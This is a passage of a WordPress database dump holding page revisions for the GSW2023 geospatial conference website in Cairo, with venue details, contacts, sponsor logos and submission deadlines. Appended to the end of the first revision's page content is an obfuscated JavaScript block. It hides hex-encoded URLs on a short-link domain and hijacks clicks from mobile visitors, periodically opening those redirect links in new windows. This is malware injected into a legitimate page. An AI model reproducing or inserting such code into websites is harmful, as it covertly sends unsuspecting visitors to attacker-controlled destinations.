0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][nk_awb awb_type=\"image\" awb_stretch=\"1\" awb_image_background_position=\"50% 50%\" awb_parallax=\"scroll-opacity\" awb_parallax_speed=\"0.5\" vc_css=\".vc_custom_1684294753369{background-image: url(https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg?id=3287) !important;}\" awb_image=\"3287\"][/nk_awb][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 03:53:09','2023-05-17 03:53:09','',3066,'https://gsw2023.com/?p=4502',0,'revision','',0),
(4503,1,'2023-05-17 03:58:06','2023-05-17 03:58:06','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" 